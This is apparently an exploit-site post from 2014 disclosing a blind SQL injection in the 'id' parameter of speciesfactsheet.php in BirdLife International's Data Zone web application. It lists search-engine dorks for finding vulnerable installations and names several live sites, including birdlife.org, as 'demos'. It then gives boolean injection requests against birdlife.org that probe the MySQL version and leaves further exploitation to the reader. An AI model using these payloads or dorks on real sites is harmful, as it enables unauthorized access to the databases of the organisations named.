(0day) BirdLife International’s Data Zone - Blind SQL Injection Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-mail: knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org
|~| Eski Dostlara Selam, kaldığımız yerden devam.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BirdLife International’s Data Zone
|~Price : N/A
|~Version : N/A
|~Software: http://www.qpqsoftware.com/qpq/portfolio
|~Vulnerability Style : Blind SQL Injection
|~Vulnerability Dir : /datazone/
|~Dorks:
inurl:speciesfactsheet.php
inurl:/datazone/   QPQ Software
|[~]Date : "4 EYLUL 2014"
|[~]Tested on :
(L)Kali Linux,
(R)Apache 2.2.22, PHP 5.3.10
(R)MySQL 5.0.11
----------------------------------------------------------
speciesfactsheet.php 'id' Function Not Security
 --------------------------------------------------------
DEMOS;
http://worldbirdwatch.org/datazone/
http://www.spoonbilledsandpiper.info/datazone/
http://www.birdlife.org/datazone/
http://rarebirdclub.org/datazone/
http://www.save-spoony.info/datazone/
www.worldbirdfestival.org/datazone/
http://bl-www.spoiledmilkclients.com/datazone/

~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}|
   
    HTTP://{TARGET}/datazone/speciesfactsheet.php?id=  //SQL command
   
    Example;
   
    Mysql Version?
    SQL Injecting : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=4      {FALSE}
    SQL Injecting Retry : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=5  {TRUE}
   
    the rest is up to you exploit.